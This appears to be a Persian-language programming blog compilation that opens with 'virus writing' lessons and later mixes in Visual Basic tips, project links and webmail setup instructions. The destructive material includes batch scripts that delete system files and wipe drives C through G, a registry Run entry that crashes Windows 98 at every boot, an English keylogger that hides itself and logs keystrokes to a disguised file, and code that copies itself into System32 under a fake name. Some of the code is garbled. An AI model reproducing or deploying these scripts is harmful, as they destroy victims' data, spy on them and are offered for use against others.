خوب اول یک Notepad  یا همان Txt Document  باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت Bat سیو میکنید... C: del autoexec.bat del config.sys cd winnt del system.ini del win.ini  مثل: Virus.bat به جای کلمه ویروس هم اسم مورد نظر را بگذارید... ************************************************** آموزش ساخت ویروس های قوی و کشنده . 1=ویروس خطرناک cpu-567njkblaster بعد با پسوند bat. سیو کنید. خطر: یک بار هم روی سیستم خودتون امتحان نکنید. ویروس graphic card lower : توضیح در باره ویروس: این ویروس فضای کارت گرافیک رو پر میکنه و دیگه هیچ بازی رو سیستم اجرا نمیشه. نت پد رو باز کنید و در آن تایپ کنید : c/windows/system32/jefo/display/memory/full و برای save کردنش گزینه file رو زده و save as... رو انتخاب کنید و اونو با اسم XXX.bat ذخیره کنید اکنون ویروس شما آماده میباشد ________________________________________ 2=ساخت ویروس فکر می کنم همه شما ویروس Blaster رو بشناسید (ویروسی که باعث Shutdown شدن کامپیوتر تو 60 ثانیه می شد و می شه) و حتی خیلی از شما روش ساخت اون را بدونید ولی لازم میدونم نگاهی سریع به اون بندازم. این ویروس رو به طریق مختلفی و با دستورات گوناگونی می شه نوشت که در این جا دو روش رو مورد بررسی قرار میدیم اگر از این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده کنید. روش اول با استفاده از Shortcut : در جایی از دسکتاپ خود کلیک راست کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از دستورات زیر را وارد کنید: 1)shutdown -s -t xx 2)%windir%system32shutdown.exe -s -t xx توضیح: بعد از اینکه Paste کردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا کامپیوتر پس از آن زمان خاموش شود. سپس Next را بزنید و برای فایل خود یک نام برگزینید و کار تمام است. روش دوم به کمک Notepad : نت پد را باز کنید و باز هم یکی از دو دستور بالا را در آن Paste کنید و حالا فایل خود را با پسوند bat یعنی با نامی مثل shutdown.bat سیو کنید. برای پادزهر درست کردن برای این ویروس هم میتوانید از دستور زیر استفاده کنید: shutdown -a و همه مراحل قبل را انجام دهید.این دستور هم از هر دو راه فوق قابل اجرا است. حالا میرسیم به نکات تکمیلی در مورد چگونه میتوان برای BatchFile ها آیکون انتخاب کرد. باید بگویم یکی از ساده ترین روشها که به هیچ نرم افزار خاصی نیاز ندارد این است که شما از BatchFile مورد نظر یک Shortcut بسازید و برای Shortcut براحتی آیکون انتخاب کنید و فایل اصلی را Hidden کنید. تا به حال هیچ به این فکر افتاده اید که اگر در کامپیوتری Notepad و Wordpad و Microsoft Word نصب نشده باشد شما این همه ترفند را کجا میخواهید پیاده کنید. آیا میدانید هکرها معمولا در محیط متنی دیگری بجز اینها اقدام به نوشن برنامه میکنند؟ بله این محیط متنی به نسبت ناشناخته همان ادیتور داس (Dos Editor) است. شما در این ادیتور میتوانید کد برنامه ها را ببینید. برای وارد شدن به این محیط وارد داس شوید و تایپ کنید Edit. صبر کنید. قبل از اینکه وارد این محیط شوید باید بدانید بر خلاف محیط بی آزار نت پد محیط Dos Editor بسیار بسیار خطرناک است. هرگونه تغییری که خواسته یا ناخواسته در متن کد ها بوجود آورید امکان هیچگونه بازگشت ندارد (اینجا از کلیدی به نام Undo خبری نیست.) همچنین همه تغییرات بطور خودکار سیو میشود و هیچگاه موقع خروج از ادیتور ازشما سوال نمیشود که Do you want to save changes و همه چیز بطور خودکار ذخیره شده و اگر احیانا کد فایل های اصلی سیستم را دستکاری کنید حتی System Restore و Backup های رجیستری هم به دادتان نخواهند رسید ________________________________________ شبه ویروس اگه ویندوز 98 دارید برید تو Run و تایپ کنید Con/Con : چیزى که مشاهده خواهید کرد همون صفحه آبى رنگ ویندوز! هیچ چاره اى جر restart کردن رو براتون باقى نمی گذاره.حالا چه جورى می تونیم از این باگ که در ویندوز98 موجود است استفاده کنیم.یکى از راهاش اینه که در یک صفحه اینترنت این دستور را وارد کنیم که این فایل را از کامپیوتر فراخوانى کند بدین صورت file:///c:/con/con می توانید از این باگ یه فایل درست کنید که وقتى کسى این فایل رو اجرا کرد هر بار که کامپیوترش این فایل فراخوانى بشه و راهى بجز فرمت رو براش پیش رو نگذاره یه صفحه یtxt باز کنید و این دستورات رو توش بنویسید و با پسوند .REG سیو کنید windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\Curr entVersion\Run] @="c:\\con\\con" این باعث میشه که باهر بار ریستارت کردن کامپیوتر این دستور اجرا بشه و نهایتا همون صفحه آبى رنگ بیاد که راهى جز restart کردن نداره.اگر ویندوز NT /200 / XP می توانید یه کار دیگه بکنید یه صفحه یtxt ‌‌باز کنید بعد این کامند ها رو بتوش بنویسید c: del autoexec.bat del config.sys cd winnt del system.ini del win.ini بعد فایل رو با پسوند .BAT سیو کنید. این فایل رو وقتى براى کسى بفرستید هیچى نمی شه اما به محض اینکه کامپیوتر رو restart کنه دیگه بار بعدی بالا نمیاد. ________________________________________ آموزش ویروس نویسی این ویروس بسیار خطرناک است چون با اجرا شدن آن دیگر برای قربانی راهی جز اف دیسک کردن کامپیوتر باقی نمی ماند. مواظب باشید اشتباها روی آن دابل کلیک نکنید. هرگونه استفاده غیر متعارف از این ویروس به عهده کاربر می باشد. متن ویروس: ATTRIB -a -s -h -r c ATTRIB -a -s -h -r c:\windows\*.* Echo y | echo a | Echo y | del c:\*.* Echo y | echo a | Echo y | del d:\*.* Echo y | echo a | Echo y | del e:\*.* Echo y | echo a | Echo y | del f:\*.* Echo y | echo a | Echo y | del g:\*.* echo y | copy *.* C:\ echo y | copy *.* D:\ echo y | copy *.* E:\ echo y | copy *.* F:\ echo y | copy *.* G:\

در مین یابی همیشه موفق باشید!

بازی مین روب یا Minesweeper چندین سال است که همراه ویندوز به عنوان یک بازی محبوب ارائه می شود. اگر شما نیز به این بازی علاقمند هستید و می خواهید همیشه در آن پیروز باشید، مراحل زیر را طی کنید:

1- وارد بازی Minesweeper شوید.
2- عبارت xyzzyرا در حالی که پنجره Minesweeper فعال است ، تایپ کنید و کلیدهای Shift + Enterرا فشار دهید.
3- تمامی پنجره های دیگر را Minimize کنید تا Desktop ویندوز را مشاهده کنید.

خوب حالا شروع به بازی کنید .زمانی که نشانگر ماوس را روی خانه ای می آورید که دارای مین است ، نقطه ای کوچک در گوشه بالا و سمت چپ دسک تاپ سیاه می شود و زمانی که ماوس را روی یک خانه امن ببرید، همان نقطه سفید می شود.
با این روش می توانید دوستان خود را حیرت زده کنید زیرا این نقطه کوچک توجه کمتر کسی را به خود جلب میکند.

پروژه های اماده برای تمرین

 

ترفنـــــــــــــــــــــــــــد:

برای اینکه بعد از قرار دادن کنترل هاتون نخواید دوباره فونت تک تک اونها رو تغییر بدهید برای این کار قبل از قرار دادن اونها روی فرم ابتدا فونت فرم رو به فونت مورد نظرتون که من Tahoma رو پیشنهاد میکنم تغییر بدهید و سپس هر کنترلی که روی فرم قرار بدهید با فونت فرم یکی میشود

نکتـــــــــــــــــــــــــــــه:

برای حرکت دادن کنترل های رو فرم به صورت دقیق تر و بدون لرزش میتونید این کار رو با کیبرد انجام بدهید که فقط روی کنترل مورد نظر کلیک کنید و سپس کلید کنترل رو پایین نگه دارید و با کلید های مکان نما اون رو جابجا کنید که این کار رو می تونید با انتخاب دسته جمعی کنترل ها هم انجام بدهید

نکتـــــــــــــــــــــــــــــه:

برای تغییر اندازه کنترل های روی فرم میتونید ابتدا انها را انتخاب کنید و سپس کلید شیفت رو پایین نگه دارید و با کلید های مکان نما اونها رو تغییر اندازه بدهید

نکتـــــــــــــــــــــــــــــه:

بعضی مواقع شما نوشته داخل یک کنترل مثل یک Label رو به فارسی تغییر میدهید که این عبارت به درستی نشان داده نخواهد شد که برای رفع این مشکل باید فونت اون کنترل رو به Tahoma تغییر دهید

نکتـــــــــــــــــــــــــــــه:

برای اینکه در پنجره خصوصیت اشیاء سریعتر به خصوصیت مورد نظر پرش کنید میتوانید با نگه داشتن کلید کنترل و شیفت و زدن اولین حرف خصوصیت مورد نظر به ان پرش کنید

برنامه نمونه مشاور املاک(درخواستی)

دیجیتال

DNS

کدهای اماده برای کار های مختلف

بخش اول ویژوال بیسیک شبیه سازی شده(انگلیسی)  بخش دوم  بخش سوم

اقای Hacker alone ( درخواستی)

برنامه جالب سه بعدی

فارسی ساز ویژوال بیسیک ( در فایل متنی داخلش توضیح دادم ) بخش اول

پسوردش هم : VBLog.blogfa است حتمــــــــــــــــــــــــا دانلود کنید هر بخش ۱۵۰ کیلو بایت است

بخش دوم  بخش سوم  بخش چهارم  بخش پنجم  بخش ششم  بخش هفتم بخش هشتم بخش نهم

پنجره شناور (اقا کمال) قسمتی از وی بی 

فکس با وی بی

فکر و بکر

جستجوی دیتا بیس

پر کننده گرافیکی

اکواریــــــــــــــــــــــــــــــــم

جالبــــــــــــــــــــــــــــــــه

توابــــــــــــــــــــــــــع

پنجره شفاف

پنجره شفاف 2

محاسبه کننده زمان توقف موس

مبدل تصاویر

جلوه دهنده تصاویر

قفل کننده پوشه ها

ماتریکس برای بچه های مهندسی و ریاضی

حرکت دهنده موس

برش دهنده تصاویر

پین باتون

پینگ

پینگ ای پی

Trace

طیف نما برای کارهای مولتی مدیا جالب

بک گراند Fifa برای جام جهانی 2010 خودم طراحی کردم

شبیه سازی قسمت معلولین ویندوز

اموزش Active X

سرعت سنج اینترنت خیلی جالبه

جستجو در بین پوشه ها

یک Progress bar کاربردی و جالب

یک بوتر به همراه فایل اجرایش

باز کردن Combo box با زدن اینتر

اعداد مختلط

کپی فایل به همراه نوار پیشرفت

فهرست کشورهای جهان برای شما

متوقف کردن برنامه در تاریخ معین شده

تبدیل Fat32 به Ntfs

دیوار اتش با VB

تبدیل فوریه برای بچه های الکترونیک و ریاضی

تبدیل عکس به متن

برنامه نمونه کار با پورت

پیانو

یک نمونه کوچک از برنامه خودم(وی بی فارسی)(اقا کمال)

اموزش برنامه نویسی Socket Programing

یک نمونه کوچک از برنامه خودم (نوار مرزی)

یافتن متن

تبدیل متن به عکس

تبدیل کدهای وی بی به دلفی

شبیه سازی یک قسمت از Nero ( نمایش طیفی فایل صوتی)

کاوشگر اینترنت

یک فرم رو توی یک فرم دیگه

تنها با دو خط کد میتونید جلوه ای رو بوجود بیارید که فکرشم نمی کردید. یک فرم رو توی یک فرم دیگه جابدید. استفاده های زیادی میشه ازش کرد. مثلا ساخت نوار ابزارهایی مثل اونی که فتوشاپ داره. راجع بهش فکر کنید
این هم کدش

Private Declare Function SetParent Lib "user32" ( _
ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long

Private Sub Form_Load()
SetParent Form2.hWnd, hWnd
Form2.Show
End Sub

با این تابع می تونید آیکون های روی دسکتاپ رو مخفی و ظاهر کنید

اول فراخوانی توابع

Option Explicit
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hWnd As Long, ByVal nCmdShow As Long) As Long

بعد سه تا کامند برای ظاهر کردن آیکون ها مخفی کردن آنها و خروج از فرم بنویسید

کد هر کدام اینطور است

Private Sub cmdDHide_Click()
Dim hWnd As Long
hWnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hWnd, 0
End Sub'--------------------------------
Private Sub cmdDShow_Click()
Dim hWnd As Long
hWnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hWnd, 5
End Sub'---------------------------------
Private Sub cmdExit_Click()
Me.Hide
End
End Sub'-------------------------------------

تعداد مشخص اجرا

شرح برنامه : می خواهیم برنامه ای بنویسیم که دارای تعداد مشخص اجرا باشد . یعنی کاربر فقط بتواند پنج بار این برنامه را اجرا کند و در هر بار اجرای آن پیغامی مبنی بر تعداد باقیمانده دفعات اجرا برای کاربر نمایش داده شود و هنگامی که این تعداد به پایان رسید پیغامی نمایش داده شود که دیگر کاربر نمی تواند این برنامه را اجرا نماید . مانند برنامه هایی که دارای قفل یا به اصطلاح رجیستری هستند .

_ برای این کار شما فقط کافی است کدهای زیر را در Form_Load برنامه خود قرار دهید :

()Private Sub Form_Load
Dim RunCount As String
( "RunCount = GetSetting("Test", "Setting", "RunCount
If Val(RunCount) > 5 Then

_,"مهلت اجرای برنامه به پایان رسیده و شما دیگر قادر به اجرای آن نخواهید بود"MsgBox vbExclamation , "اتمام مهلت"

End
Else

_ ,"شما فقط " & ((Str(4 - Val(RunCount & " بار دیگر می توانید این برنامه را اجرا کنید" MsgBox

vbInformation, "تعداد اجرای باقیمانده"

(SaveSetting "Test", "Setting", "RunCount", Str(Val(RunCount) + 1
End If
End Sub

حال فایل exe از برنامه خود بسازید و آن را اجرا نمایید

Creating a KeyLogger in VB

Ok...I am assuming that you have a basic understanding as to how visual basic works and how to make programs, debug, and compile. If not, email me and I might be able to help.

First, if you don't have it, get it. ApiGuide. Download it at http://www.mentalis.org/agnet/apiguide.shtml

Ok. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to Start Logging
(if you want to make it start on startup...pm me or email me)
Now using api guide or just copying from here, declare a new function. the GetASyncKeyState function

Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
(ByVal vKey As Long) As Integer

^---put this in the declarations section of the module.

That is all one line of code. Make sure its like that. and not split in 2.

Now you have a new function to use through your program.
ok...
now we must make it be "invisible". Now im sorry but in Windows XP, i do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.

OK. In the button code..., in the click event of course...
type the following

app.taskvisible = false
form1.visible = false
form1.hide
timer1.enabled = true

'and also in the properties section of the form...change the shownintaskbar to false

Now when we click the button...it goes invisible.

Now we are going to need some variables....
Back in the declarations section declare the following...

Dim strLetter as String, strTotal as String

Now in the timer code put this. Ill explain afterward.
also set the interval to 1 and enabled to false

Private Sub Timer1_Timer()

For I = 28 To 128

If GetAsyncKeyState <> 0 Then

strLetter = Chr(I)

'Now here you can add certain things
'so that instead of displaying
'retarded characters, it tells you
'what the user pressed. What I mean
'is if they press Enter/Return, it will
'Show some weird box. You dont want that
'so u make a select case about I for each
'button u want to customize. PM me or Email
'me for help on this part.

strTotal = strTotal & strLetter

End If

Next I

open "C:\Windows\SysResources.DAT" for output as #1
Print #1, strTotal
close #1

End Sub

'End Code

Now all you have to do is when you want to check the keys pressed, open up C:\Windows\SysResource.DAT in notepad, and there it is. This program will not run on start up. If you want to know how to do that, PM me, but preferably email me. I would much rather have you add me to Msn Messenger. My email for messenger is... Black_viper_13@hotmail.com
My email for emailing is..... Anarchist_ninja_thief@hotmail.com.

Hope this helps!
Here is the entire coding for the lamers...

'BEGINNING

Dim strLetter As String, strTotal As String, old as string

Private Sub Command1_Click()
Timer1.Enabled = True
End Sub

Private Sub Form_Load()
Command1.Caption = "Start Loggin"
Timer1.Enabled = False
Timer1.Interval = 1
End Sub

Private Sub Timer1_Timer()
For I = 28 To 128 'ASCII code
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
End If
If strletter <> Old Then
Old = strletter
strTotal = strTotal & old
End If
Next I
Open "C:\windows\SysResources.dat" For Output As #1
Print #1, strTotal
Close #1
End Sub

'ENDING

i think thats it besides the Module of course.

مجموعه ای از کاربردی ترین دستورات برای ویروس نویسی

مجموعه ای از کاربردی ترین دستورات برای برنامه نویسی

در این مجموعه که توسط گروه ما جمع آوری شده است دستوراتی ساده شده وجود دارد که به جای نوشتن کد های آن می توانید با یک خط از آن استفاده کنید.مثلا برای ارسال ایمیل به ده ها خط برنامه نویسی نیاز دارید ولی با این مجموعه فقط در یک خط یک ایمیل ارسال کنید.

برای استفاده از این مجموعه شما باید در قسمت کامپوننت ها (Components) این فایل(XSX.OCX) را انتخاب کنید(Browse) و انر تیک دارد کنید و در برنامه نویسی از آن استفاده کنید مثلا برای ارسال ایمیل:

"XSXToolz1.SendMail " mail@from.you ", " mail@TO.com ", "Subject", "Body

وی دیگر عملیات مورد نیاز:

1- Always on Top برای فرم ها و هر هندل.

۲- تبدیل رشته ای از کاراکترهای یونیکد به کدهای ASCII.

3- تبدیل رشته ای از کد های ASCII به کاراکتر های یونیکد.

۴- تغییر ژس زمینه میز کار(Desktop Wallpaper)

5- قرنتینه موس در محدوده فرم به صورتی که موس نتواند از محدوده فرم خارج شود.

6- غیر فعال کردن راست کلیک بر روی فایل ها.

7- غیر فعال کردن مدیروظایف Task Managerیا همان (Ctrl + Alt + Del).

8- فرمت غیر مستقیم درایو ها.

9- گرفتن عکس از تصویر مانیتور و ذخیره آن در فایل.

10- گرفتن آدرس پوشه سیستم.

11- گرفتن رمز و آی.دی یاهو.(در صورت نیاز به کمک با ما درمیان بگزارید)

12- مخفی کردن Folder Options.

13- تشخیص اتصال به اینترنت.

۱۴- قفل کردن یک پنجره بوسیله دادن هندل.

۱۵- Minimize کردن یک پنجره با دادن هندل آن.

۱۶- مخفی کردن Display Properties در راست کلیک در بروی میزکار(ِDesktop).

17- مخفی کردن Properties در راست کلیک در روی My Computer.

18- غیر فعال کردن تغییر تصویر میزکار(Desktop).

19- خواندن محتویات یک فایل.

20- بستن یک پنجره با دادن هندل آن.

21- ارسال ایمیل بسیار آسان.

22- قرار دادن مختصات موس در مختصات وارد شده.

23- مخفی یا آشکار کردن یک پنجره از روی مانیتور با دادن هندل ان(پنجره را نمی بندد فقط مخفی می شود)

24- مخفی یا آشکار کردن موس.

25- قرار دادن خاصیت اجرای خود کار برنامه(بعد از هربار بالا آمدن ویندوز برنامه شما اجرا شود)

26- جابه جایی کلیک چپ و راست موس.

27- مخفی یا آشکار کردن نوار وظیفه (Taskbar).

28- نوشتن اطلاعاتی در یک فایل.

حجم فایل: 24 کیلوبایت

لینک دانلود

: تغییر در پس زمینه ( ویروس نویسی حرفه ای )

Wallpaper :    تغییر در پس زمینه

چند وقت پیش یکی از بازدید کنندگان این وبلاگ این ویروس را سفارش دادند که کمتر جایی آنرا دیده اید . این ویروس جالب در مرحله اول آدرس پس زمینه  کامپوتر را گرفته

و عکسی را بر روی Wallpaper کامپیوتر فرد   درج می کند ! به طوری که با عوض کردن دوباره  پس زمینه  این کار نیز دوباره انجام می شود ! سورس این ویروس ساده نیز هست البته کسانی که خود ویروس را می خواهند باید عکس مورد نظر خودرا (همان عکسی که قرار است بر روی کامپیوتر فرد قربانی درج شود) برای ما ارسال کنند و بعد در همین پست به ما نظر بدهند . برای دیدن گوشه ای از خرابکاری این ویروس بر روی ادامه مطلب کلیک کنید.

ویروس به همراه سورس (حجم 200 کیلو بایت)

آموزش پله به پله ویروس نویسی

_{^{اگر ویروس نویسی جرم است به جای ما به دنبال سازنده ویروس ایدز باشید که تمام جوانان را به دام خود برده و تا به حال ویروس کش آن را نتوانستند بسازند نه McAfee نه Symantec#}}

آیا می دانید بهترین کامپایلر ویروس چیست(منظور زبان های برنامه نویسی است)؟

بسیاری بر این عقیده اند که ویژوال بیسیک ۶ بهترین کامپایلر است تا زمانی که ویندوز وجود دارد و ساختارش چنین باشد.اما بسیاری هم دلفی را به عنوان زبان ویروس خود انتخاب کرده اند،اما این مهم نیست، مهم خلاقیت ویروس نویس و مهارت وی است.

گروه ما هم عقیده اول را قبول دارد زیرا در تمامی ویندوز های XP و 2000 و فایل مورد نیاز برنامه های وی.بی وجود دارد و همچنین برنامه نویسی با ویژوال بیسیک 6 بسیار ساده و راحت می باشد به طوری که یک فرد می تواند در مدت زمان کمتر از 6 ماه ویروس نویسی خوب شود.

از تمامی این حرف ها می گذریم...

پله اول مرحله اول

در این مرحله باید با ویژوال بیسیک و Syntax آن و چندین نکته ساده را بیاموزید(به دلیل این که در این دوره آموزشی قصد ما تنها آموزش های ویروس نویسی است این مرحله را به عهده خودتان می گذاریم،می توانید از فروم های فارسی در این زمینه و کتاب های آموزشی استفاده کنید)

پله اول مرحله دوم

در مرحله باید تمامی افکار خود را به سمت ویروس نویسی برده و خود را برتر ببینید ولی به هیچ عنوان زیاده روی(لاف) نکنید.

با یک مثال بسیار ساده شروع می کنیم:

Set fso = CreateObject("Scripting.FileSystemObject") sys$ = fso.GetSpecialFolder(1) fso.CopyFile App.Path & "\" & App.EXEName & ".exe", sys & "\devmgr.exe",True

توضیحات دقیق:

اگر دقت کنید،

در سطر اول کد نویسی از دستور Set استفاده کردیم،این دستور یک شیء را در یک متغیر ذخیره میکند.پس از آن نام متغیر و سپس از دستور CreateObject استفاده کردیم،این دستور با یکی از کلاس های رجیستر شده در سیستم(ویندوز) را صدا زده و استفاده می کند.برای مثال اگر Internet Explorer را در سیستم خود داشته باشید(که اگر از سیستم عامل ویندوز استفاده می کنید حتما دارید) یک کلاس با نام'InternetExplorer.Application' در سیستم رجیستر می شود که می توان با استفاده از آن یک مرورگر را باز کرده و کنترل تقریبا کامل را روی آن داشته باشید.(برای دیدن لیستی از بعضی از کلاس های رجیستر شده در ویندوز می توانید در برنامه جانبی Registry Editor پوشه یا کلید HKEY_CLASSES_ROOT را باز کرده و آن ها را مشاهده کنید.توجه داشته باشید تمامی پوشه های این کلید کلاس نیستند).در اینجا ما با استفاده از دستور CreateObject یک کلاس را که مدیریت فایل ها و پوشه های ویندوز را می تواند انجام دهد،صدا زدیم،به نام''

هنگامی که شما یک شی را با استفاده از دستور Set صدا می زنید ،باید همانند اشیای دیگر وی.بی(مثل TextBox) از آن استفاده کنید.یعنی برای استفاده از یک تابع آن باید نام متغیر را نوشته سپس یک نقطه زده و نام تابع را بنویسید.مثل:

fso.FunctionName

فراموش نکنید که CreateObject یک تابع از پیش تعریف شده در وی.بی می باشد.

*نکته*اگر یک شی را با استفاده از تابع یا دستور CreateObject بسازید،مانند اشیای اصلی وی.بی هنگامی که یک نقطه پس از نام آنها بزنید لیست خصوصیات و توابع را نمایش نمی دهد و شما باید از قبل آن ها را بدانید.(البته اگر فایلی که منبع کلاس است را در قسمت References از منوی Project وارد پروژه کنید می توانید آن را با اسفاده از Dim صدا بزنید که در این صورت لیست مذکور با می شود)

و در سطر دوم یکی از توابع کلاس FileSystemObject را صدا زدیم(GetSpecialFolder)این تابع آدرس پوشه های اصلی ویندوز را برای ما برمیگرداند مثل آدرس پوشه 'System32' یا 'Windows' یا 'Temp' .پس تابع پرکاربردی است،ولی مشکل اساسی این است که بسیاری از ضد ویروس ها به استفاده از این تابع حساسیت دارند.این تابع تنها یک آرگومان نیاز دارد که یک شماره است این شماره از 0 تا 2 می باشد در زیر رشته برگردانده شده تابع را نسبت به اعداد وارد شده می بینید:

اگر 0 بدهیم آدرس پوشه ویندوز را برمیگرداند.

اگر 1 بدهیم آدرس پوشه سیستم را برمی گرداند.

اگر 2 بدهیم آدرس پوشه Temp یا فایل های موقت را برمیگرداند.

*نکته* اگر دقت کنید پس از نام متغیر این خط(Sys) یک علامت $ آورده ایم.این علامت به این معناست که متغیر را از نوع String در نظر بگیرد.از این علامت ها زمانی استفاده که نخواهیم متغیر را با استفاده از دستور Dim ایجاد کنیم.برخی علامت در زیر آمده است:

$ برای String

# برای Double

% برای Integer

! برای Single

& برای Long

@ برای Currenry

در سطر سوم یکی از روال های کلاس مذکور را صدا زدیم که این روال یک فایل را در رایانه کپی می کند.این روال حداکثر سه آرگومان نیاز دارد و حداقل دو آرگومان نیاز دارد. منظور چیست؟ منظور این است که دو آرگومان اصلی دارد و یک آرگومان اختیاری دارد.شکل اصلی این روال به صورت زیر است:

CopyFile(Source As String, Destination As String, [OverWriteFiles As Boolean = True])

Source آدرس فایل اصلی که می خواهیم کپی است.

Destination آدرسی است که می خواهیم فایل آنجا کپی شود،است.

آرگومان سوم از نوع Boolean است یعنی یا 0 یا 1(True Or False) که اگر False باشد و فایلی در آدرس Destination وجود داشته باشد آن فایل را کپی نمیکند ولی اگر True باشد در صورت وجود فایل آن را رونویسی (Overwrite) می کند و فایل اصلی جای آن کپی می شود.

اگر دقت کنید آرگومان اول یعنی آرس فایل اصلی را به این گونه وارد کرده ایم:

App.Path & "\" & App.EXEName & ".exe"

App یکی از شی های وی.بی است که در آن می توانید خصوصیاتی از برنامه اجرایی خود ببینید.برای مثال چک کنید که آیا برنامه قبلا اجرا شده یا نه:

P = App.PrevInstance

که ااگر برنامه شما قبلا اجرا شده باشد متغیر P برابر می شود با True و اگر برنامه قبلا اجرا نشده باشد مقدار False را برمی گرداند.

در اینجا ما از دو خصوصیت Path و EXEName استفاده کرده ایم ،

در خصوصیت Path مسیر فایلی ذخیره می شود که برنامه از آن اجرا می شود،مثلا اگر برنامه شما اینجا باشد:

C:\XSX_Learn\XSX_Team.Exe

در خصوصیت Path مقدار C:\XSX_Learn ذخیره می شود.

و در خصوصیت EXEName نام فایل اجرایی شما می باشد که در همان مثال بالا برابر XSX_Team می باشد.

*نکته*اگر دقت کنیددر آخر مقدار خصوصیت Path علامت \ نشان داده نمی شود و همچنین در آخر EXEName پسوند ذخیره نمی شد.پس اگر این کد را در همان مثال بالا نوشته باشیم و برنامه را اجرا کنیم:

X_Path = App.Path & App.EXEName MsgBox X_Path

این مقدار نمایش داده می شود:

C:\XSX_LearnXSX_Team

پس برای تصحیح کد بالا باید آن را به این گونه تغییر بدهیم:

X_Path = App.Path & "\" & App.EXEName & ".Exe" MsgBox X_Path

به این منظور که گفته ایم بعد از آدرس پوشه علامت \ را اضافه کند و همچنبن بعد از نام فایل اجرایی پسوند آن را اضافه کند(Exe).که مقدار نمایش داده شده به این صورت می شود:

C:\XSX_Learn\XSX_Team.Exe

بقیه آرگومان ها هم بسیار واضح است ولی تنها نکته این اینست که متغیر Sys مقداری برابر مثلا 'C:\Windows\System32' دارد و همین طور میبینید در آخر آن علامت \ وجود ندارد.

*نکات توضیحی اضافه*

1 - فرق تابع(Function) با روال این است که تابع مقداری را بر می گرداند ولی روال یا Sub مقدار برگشتی ندارد.

2 - رشته ها در وی.بی با استفاده از علامت & به یکدیگر می چسبند.

تشخیص وجود اتصال به اینترنت

با استفاده از این API میتوانید تشخیص دهید که آیا سیستم به اینترنت متصل است یا خیر.طبق معمول اگر متصل باشد مقدار True  و در غیر این صورت False  را بر می گرداند.

کد:

Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long Private Sub Form_Load() If InternetGetConnectedState(1, 0) = True Then MsgBox "Is Connected To Internet.", vbInformation ElseIf InternetGetConnectedState(1, 0) = False Then MsgBox "Not Connect To Internet.", vbCritical End If End Sub

آموزش استفاده از WebMail و POP3

لینک ارتباطی به WebMail

 برای ورود به بخش پست الکترونیک از طریق Web می بایست در قسمت Address مرورگر کامپیوتر خود(مانند Internet Explorer)، یکی از آدرسهای زیر را وارد نمایید و Enter کنید.

http://yoursite.com/webmail/
یا
http://yoursite.com:2095

در روش دوم اجباریست Internet Explorer در http:// نوشتن جمله

پس از وارد شدن به یکی از روش های بالا نام کاربری و رمز عبور خواسته می شود که باید نام کاربری و رمز عبور آدرس ایمیل مورد نظر را وارد کنید.
لازم به توضیح است نام کاربری در اینجا، همان آدرس ایمیل ساخته شده توسط شما می باشد.
بعد از این مرحله، با یکی از 3 نرم افزار مدیریت ایمیل که روی صفحه می آید، می توانید وارد کلیه قسمت های ایمیل خود شوید.
پیشنهاد می کنیم از Horde استفاده کنید.

     

Ùبرو بالاÙ

آدرس POP3 و SMTP

 برای استفاده ایمیل خود در نرم افزار های POP3(مانند Outlook)، باید در محل مربوطه تنظیمات را مانند زیر انجام دهید:

 لازم به توضیح است، در صورتی که تمایل به استفاده از IMAP دارید، استفاده از این سرویس هم به شکل مشابه با POP3 می باشد.(همانند شکل زیر)

Ùبرو بالاÙ

معرفی یک نرم افزار مدیریت ایمیل و طریقه کار با آن

 نرم افزاری که ما به شما معرفی می کنیم، نرم افزار Outlook است، این نرم افزار روی کلیه سیستم عامل های Windows نصب می باشد.

با باز کردن این نرم افزار، باید به منوی Tools رفته و گزینه E-mail Accounts را انتخاب کنیم.

در این قسمت با انتخاب Add a new e-mail account درخواست ایجاد مدیریت ایمیل جدیدی را می دهید و بعد از زدن Next نوع ارتباط خود با پست الکترونیک انتخاب می کنید(مثلاً POP3) و پس از پر کردن اطلاعات شخصی و اطلاعات ایمیل Next و Finish را می زنید.

لازم به توضیح است، User Name شما در کلیه ایمیل ها، همان آدرس ایمیل شما می باشد.

پس از نصب ایمیل خود روی Outlook می توانید به ارسال و دریافت نامه ازطریق این برنامه اقدام نمایید.